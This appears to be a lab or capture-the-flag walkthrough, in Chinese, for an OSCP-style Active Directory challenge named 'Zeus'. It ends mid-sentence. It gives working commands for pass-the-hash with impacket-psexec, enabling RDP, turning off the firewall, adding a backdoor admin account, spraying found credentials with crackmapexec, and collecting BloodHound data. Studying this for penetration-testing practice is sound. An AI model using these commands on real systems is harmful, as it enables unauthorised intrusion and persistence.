Challenge 7 - Zeus(1)
Challenge 7 - Zeus(1) 先用 impacket-psexec 進入 .160,└─$ impacket-psexec -hashes :97db5c87465431b9091d47a58fe76483 administrator@192.168.182.160 開啟 RDP,關閉 Firewall reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall set allprofiles state off 新增一組憑證 aries:Oscp#1234 然後加入本機的 administrators 管理者群組 net user aries Oscp#1234 /add net localgroup administrators aries /add 在使用者 z.thomas 的 Download 資料夾中有一個名稱為 "Onboarding Document" 的檔案 看來是報到文件,各一個 *.docx 的 Word 檔案,內容看來是使用者的預設密碼 z.thomas: ^1+>pdRLwyct]j,CYmyi 立馬 crackmapexec 測試看看,└─$ crackmapexec smb 192.168.182.158-160 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' -d zeus.corp 看來是有效的憑證 跑一下遠端 BloodHound 查看一下有無更新,└─$ bloodhound-python -d zeus.corp -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' -gc dc01.zeus.corp -c all -ns 192.168.182.158 看來 z.thomas 屬於 Remote Management 群組成員 立馬 crackmapexec 測試一下 winrm,發現可以進 DC01 .158 e...